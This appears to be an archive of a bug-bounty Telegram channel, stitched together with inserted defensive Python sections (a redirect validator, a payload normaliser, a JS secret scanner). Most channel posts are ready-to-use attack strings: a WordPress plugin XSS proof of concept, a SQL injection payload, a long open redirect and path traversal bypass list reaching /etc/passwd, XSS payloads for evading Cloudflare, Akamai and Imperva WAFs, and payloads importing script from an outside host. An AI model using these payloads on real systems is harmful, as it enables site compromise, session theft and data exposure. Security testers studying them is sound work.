Bug bounty Tips

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

Subscribers: 5 834

Post archive
CVE ID: CVE-2015-7377
System: WordPress
Type: Reflected XSS
Affects: Pie Register WordPress Plugin 2.0.18
Exploit: XSS with base64 encoding
http://localhost/wordpress/?page=pie-register&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
To copy the PoC 🔻

SQL Injection CVE-2024-36837
Payload: 0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334
#BugBounty #Tips

You can try this effective manual open redirect bypass:
1. Null-byte injection:
   - /google.com%00/
   - //google.com%00
2. Base64 encoding variations:
   - aHR0cDovL2dvb2dsZS5jb20=
   - aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
   - //base64:d3d3Lmdvb2dsZS5jb20=/
3. Case-sensitive variations:
   - //GOOGLE.com/
   - //GoOgLe.com/
4. Overlong UTF-8 sequences:
   - %C0%AE%C0%AE%2F (overlong encoding for ../)
   - %C0%AF%C0%AF%2F%2Fgoogle.com
5. Mixed encoding schemes:
   - /%68%74%74%70://google.com
   - //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
   - //base64:%2F%2Fgoogle.com/
6. Alternative domain notations:
   - //google.com@127.0.0.1/
   - //127.0.0.1.xip.io/
   - //0x7F000001/ (hexadecimal IP)
7. Trailing special characters:
   - //google.com/#/
   - //google.com/;&/
   - //google.com/?id=123&//
8. Octal IP address format:
   - http://0177.0.0.1/
   - http://00177.0000.0000.0001/
9. IP address variants:
   - http://3232235777 (decimal notation of an IP)
   - http://0xC0A80001 (hex notation of an IP)
   - http://192.168.1.1/
10. Path traversal with encoding:
    - /..%252f..%252f..%252fetc/passwd
    - /%252e%252e/%252e%252e/%252e%252e/etc/passwd
    - /..%5c..%5c..%5cwindows/system32/cmd.exe
11. Alternate protocol inclusion:
    - ftp://google.com/
    - javascript:alert(1)//google.com
12. Protocol-relative URLs:
    - :////google.com/
    - :///google.com/
13. Redirection edge cases:
    - //google.com/?q=//bing.com/
    - //google.com?q=https://another-site.com/
14. IPv6 notation:
    - http://[::1]/
    - http://[::ffff:192.168.1.1]/
15. Double URL encoding:
    - %252f%252fgoogle.com (encoded twice)
    - %255cgoogle.com
16. Combined traversal & encoding:
    - /%2E%2E/%2E%2E/etc/passwd
    - /%2e%2e%5c%2e%2e/etc/passwd
17. Reverse DNS-based:
    - https://google.com.reverselookup.com
    - //lookup-reversed.google.com/
18. Non-standard ports:
    - http://google.com:81/
    - https://google.com:444/
19. Unicode obfuscation in paths:
    - /%E2%80%8Egoogle.com/
    - /%C2%A0google.com/
20. Query parameter obfuscation:
    - //google.com/?q=http://another-site.com/
    - //google.com/?redirect=https://google.com/
21. Using the @ symbol for userinfo:
    - https://admin:password@google.com/
    - http://@google.com
22. Combination of userinfo and traversal:
    - https://admin:password@google.com/../../etc/passwd
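As an added example (not part of the channel post above), here is the kind of naive "is this redirect target ours?" check that the list is aimed at, next to a hardened version, both run against a handful of the strings from the list. The allow-listed host `app.example`, the function names and the sample list are assumptions made for this demo.

```python
# Added example, not from the channel post: a naive redirect-target check next
# to a hardened one, exercised with the bypass strings listed above.
# "app.example" and all names here are assumptions for the demo.
from urllib.parse import urlsplit, unquote

ALLOWED_HOSTS = {"app.example"}  # assumed application host(s)


def naive_is_safe(target: str) -> bool:
    """The check the bypasses above defeat: 'anything starting with a slash
    is a relative path, and anything mentioning our host is ours'."""
    return target.startswith("/") or "app.example" in target


def hardened_is_safe(target: str) -> bool:
    """Accept only an absolute path on this origin, or an http(s) URL whose
    host is exactly allow-listed, with no userinfo and no unusual port."""
    decoded = unquote(target)
    if unquote(decoded) != decoded:
        return False  # still percent-encoded after one decode: %252f, %2561 ...
    if any(ord(c) < 0x20 or ord(c) == 0x7F or c == "\\" for c in decoded):
        return False  # NUL/CR/LF/TAB tricks and backslash-as-slash
    try:
        parts = urlsplit(decoded)
        port = parts.port  # raises ValueError on junk like //base64:d3d3...=
    except ValueError:
        return False
    if parts.scheme == "" and parts.netloc == "":
        # Path-only target: exactly one leading slash, no dot-segments.
        # (urlsplit already turns a leading "//" into a netloc, so a
        # scheme-relative "//evil" never reaches this branch.)
        path = parts.path
        if not path.startswith("/") or path.startswith("//"):
            return False
        return not any(seg in (".", "..") for seg in path.split("/"))
    if parts.scheme not in ("http", "https"):
        return False  # javascript:, ftp:, and scheme-relative "//host"
    if parts.username is not None or parts.password is not None:
        return False  # https://app.example@evil/ and http://@host
    if port not in (None, 80, 443):
        return False
    return parts.hostname in ALLOWED_HOSTS  # hostname is already lower-cased


# Constructed sample: a few strings from the list above plus two legitimate ones.
SAMPLES = [
    "/account",
    "https://app.example/login?next=1",
    "//google.com@127.0.0.1/",
    "https://app.example@google.com/",
    "%252f%252fgoogle.com",
    "//google.com%00",
    "/..%252f..%252f..%252fetc/passwd",
    "javascript:alert(1)//google.com",
    "http://0177.0.0.1/",
    "http://google.com:81/",
]


def compare(samples=SAMPLES) -> dict:
    """Map each sample to (naive verdict, hardened verdict)."""
    return {s: (naive_is_safe(s), hardened_is_safe(s)) for s in samples}


if __name__ == "__main__":
    for s, (weak, strong) in compare().items():
        print(f"naive={'ok ' if weak else 'no '} hardened={'ok ' if strong else 'no '} {s}")
```

The hardened check deliberately refuses anything that is still percent-encoded after one decode and anything carrying userinfo or a non-default port, because those are exactly the layers the list uses; a path such as `/%E2%80%8Egoogle.com/` is still accepted, since after decoding it is only a path on our own origin.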

Cloudflare #XSS WAF Bypass by @nav1n0x Payload:
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F 
#cybersec #bugbountytips #infosec

Reflected XSS Akamai WAF Bypass in Redirect Parameter using HTTP Parameter Pollution and Double URL Encoding: ⚙️
/login?ReturnUrl=javascript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529

A solid XSS payload that bypasses Imperva WAF ⚙️
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
#infosec #cybersec #bugbountytips

An XSS payload to bypass some WAFs & filters in Firefox
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
#infosec #cybersec #bugbountytips

Retrieves DNS records without any authentication
curl -s "https://api.hackertarget.com/dnslookup/?q=example.com"
Replace example.com with the target domain.

Pre-Auth RCE CyberPanel 0day by Chirag Artani 🔥 Useful video from our friend's channel about one of the freshest big vulnerabilities with Netlas search 🔎 We also recommend checking out his website and Twitter for more tips: 👉 Site: 3rag.com 👉 Twitter: x.com/Chirag99Artani

Find sensitive files using Wayback
waybackurls 123.com | grep --color -E "\.xls|\.tar\.gz|\.bak|\.xml|\.xlsx|\.json|\.rar|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tgz|\.7z"
#bugbountytip #bugbounty #bugbountytips

An XSS payload with alert obfuscation, to bypass regex filters
<img src="X" onerror=top[8680439..toString(30)](1337)> <script>top[8680439..toString(30)](1337)</script>
#infosec #cybersec #bugbountytip
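As an added example (not from any of the channel posts above), the normaliser below undoes the obfuscation layers those WAF-bypass payloads rely on so a detection rule can match the plain payload: double percent-encoding (the Akamai `ReturnUrl` payload), CR/LF inside the `javascript:` scheme (the Imperva payload), `/*comment*/` splicing (the Cloudflare payload), `'wind'+'ow'` concatenation (the Firefox payload) and base-N numeric identifiers such as `8680439..toString(30)` (the alert obfuscation payload). The function names and the indicator list are assumptions for this demo.

```python
# Added example, not from the channel posts: normalise common XSS/WAF-bypass
# obfuscation so indicators can be matched on the plain payload.
# Function names and INDICATORS are assumptions made for this demo.
import re
from urllib.parse import unquote

DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"
INDICATORS = ("javascript:", "alert", "document.domain", "onerror", "eval")

_TOSTRING = re.compile(r"\(?(\d+)\)?\.{1,2}toString\((\d+)\)")   # 8680439..toString(30)
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")              # 'wind'+'ow'
_COMMENT = re.compile(r"/\*.*?\*/", re.S)                        # /*foo*/
_BRACKET = re.compile(r"\['([A-Za-z_$][\w$]*)'\]")               # self['alert']


def from_base(n: int, base: int) -> str:
    """Mirror JavaScript's Number.prototype.toString(base), 2 <= base <= 36."""
    if not 2 <= base <= 36:
        raise ValueError("base out of range")
    if n == 0:
        return "0"
    out = []
    while n:
        n, rem = divmod(n, base)
        out.append(DIGITS[rem])
    return "".join(reversed(out))


def normalize(payload: str) -> str:
    s = payload
    # 1. Percent-decode until stable (bounded): %2561 -> %61 -> a
    for _ in range(3):
        nxt = unquote(s)
        if nxt == s:
            break
        s = nxt
    # 2. Browsers drop TAB/LF/CR while parsing a URL scheme: j\n\ravascript:
    s = s.replace("\t", "").replace("\n", "").replace("\r", "")
    # 3. Strip /* */ comments used to break up property names
    s = _COMMENT.sub("", s)
    # 4. Fold 'wind'+'ow' into 'window' (loop handles longer chains)
    while True:
        folded = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", s)
        if folded == s:
            break
        s = folded
    # 5. Replace 8680439..toString(30) with the string it evaluates to
    s = _TOSTRING.sub(lambda m: "'" + from_base(int(m.group(1)), int(m.group(2))) + "'", s)
    # 6. Rewrite obj['name'] as obj.name so "document.domain" becomes visible
    s = _BRACKET.sub(lambda m: "." + m.group(1), s)
    return s


def indicators(payload: str) -> list:
    """Indicators present in the payload once normalised (case-insensitive)."""
    plain = normalize(payload).lower()
    return [ind for ind in INDICATORS if ind in plain]


if __name__ == "__main__":
    for p in ("top[8680439..toString(30)](1337)",
              "j%0A%0Davascript:alert(1)",
              "self['wind'+'ow']['one'+'rror']=alert;throw 1337;"):
        print(normalize(p), indicators(p))
```

Only the syntactic layers are unwound here: the Imperva payload's `{var{3:s,...}='earltv'}` destructuring would need actual evaluation, so for it the normaliser only exposes the `javascript:` scheme.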

Improve your #XSS reports! 🔥 Use our https://X55.is ✨ domain
✅ Replacing alert(1)
'-import('//X55.is')-'
<Svg OnLoad=import('//X55.is')>
✅ As href/src attribute
<Base Href=//X55.is>
<Script Src=//X55.is>

🇷🇺 Zero-Day by AI: Google Claims World First As AI Finds 0-Day Security Vulnerability. https://www.forbes.com/sites/daveywinder/2024/11/04/google-claims-world-first-as-ai-finds-0-day-security-vulnerability/

📌 Automated JavaScript Secret Detection
1 - Collect alive domains
docker run -v $(pwd):/src projectdiscovery/subfinder:latest -dL /src/domains -silent -o /src/subdomains
docker run -v $(pwd):/src projectdiscovery/dnsx:latest -l /src/subdomains -t 500 -retry 5 -silent -o /src/dnsx
docker run -v $(pwd):/src projectdiscovery/naabu:latest -l /src/dnsx -tp 1000 -ec -c 100 -rate 5000 -o /src/alive_ports
docker run -v $(pwd):/src projectdiscovery/httpx:latest -l /src/alive_ports -t 100 -rl 500 -o /src/alive_http_services
2 - Collect JS files for analysis (getJS)
docker run -v $(pwd):/src secsi/getjs --input /src/alive_http_services --complete --output /src/js_links
3 - Search for secrets in JS files
docker run -v $(pwd):/src projectdiscovery/nuclei:latest -l /src/js_links -tags token,tokens -es unknown -rl 500 -c 100 -silent -o /src/secret-results
or you can use trufflehog instead of nuclei
docker run -v $(pwd):/src secsi/getjs --input /src/alive_http_services --complete --output /src/js_links
docker run -v $(pwd):/src projectdiscovery/httpx:latest -l /src/js_links -t 100 -rl 500 -sr -srd /src/js_response
docker run --rm -it -v "$PWD:/src" trufflesecurity/trufflehog:latest filesystem /src/js_response/response --only-verified --concurrency=50
#bugbounty #bugbountytips
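As an added example (not from the channel post), this is the kind of matching that step 3 delegates to nuclei's token templates or trufflehog, written out so the rules are visible: a few well-known credential formats plus a Shannon-entropy check on values assigned to secret-looking names. It runs over a constructed JavaScript fragment embedded below; the AWS value is AWS's documented example key and the other values are made up. The rule set, thresholds and function names are assumptions for this demo.

```python
# Added example, not from the channel post: a small JS secret scanner that
# shows what the nuclei/trufflehog step is doing. Rules and thresholds are
# assumptions; the sample bundle below is constructed for the demo.
import math
import re
from collections import Counter

# Well-known credential formats (prefix + fixed length); a small subset.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36}\b"),
    "slack_token": re.compile(r"\bxox[baprs]-[0-9A-Za-z-]{10,}\b"),
    "google_api_key": re.compile(r"\bAIza[0-9A-Za-z_-]{35}\b"),
}
# Anything assigned to a secret-looking name is a candidate for the entropy check.
ASSIGNMENT = re.compile(
    r"(?i)\b([A-Za-z_]*(?:secret|token|api[_-]?key|password|passwd)[A-Za-z_]*)"
    r"\s*[:=]\s*['\"]([^'\"]{8,})['\"]"
)
ENTROPY_THRESHOLD = 3.5  # bits per character; placeholders fall well below this

# Constructed sample: AWS's documented example key and made-up strings.
SAMPLE_JS = """// constructed bundle fragment for the demo
const region = "eu-west-1";
const awsKey = "AKIAIOSFODNN7EXAMPLE";
const ghToken = "ghp_0123456789abcdefABCDEF0123456789abcd";
window.API_SECRET = 'kR9#vQ2!mZ7pL4xW8nB3cT6yH1jD5sF0';
const apiKey = "changeme_changeme";  // named like a secret, but a placeholder
"""


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def scan_js(source: str) -> list:
    """Return findings as dicts with rule, value and 1-based line number."""
    findings = []

    def line_of(pos):
        return source.count("\n", 0, pos) + 1

    for name, pat in PATTERNS.items():
        for m in pat.finditer(source):
            findings.append({"rule": name, "value": m.group(0), "line": line_of(m.start())})
    for m in ASSIGNMENT.finditer(source):
        value = m.group(2)
        already = any(f["value"] == value for f in findings)  # don't double-report
        if not already and shannon_entropy(value) >= ENTROPY_THRESHOLD:
            findings.append({
                "rule": "high_entropy_" + m.group(1).lower(),
                "value": value,
                "line": line_of(m.start()),
            })
    return findings


if __name__ == "__main__":
    for f in scan_js(SAMPLE_JS):
        print(f"line {f['line']}: {f['rule']}: {f['value']}")
```

The format rules catch keys regardless of the variable they live in; the entropy rule only fires on names that look like secrets, which is why the low-entropy `changeme_changeme` placeholder is skipped even though its name matches.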

32 vulnerabilities in IBM Security Verify Access - IT Security Research by Pierre https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html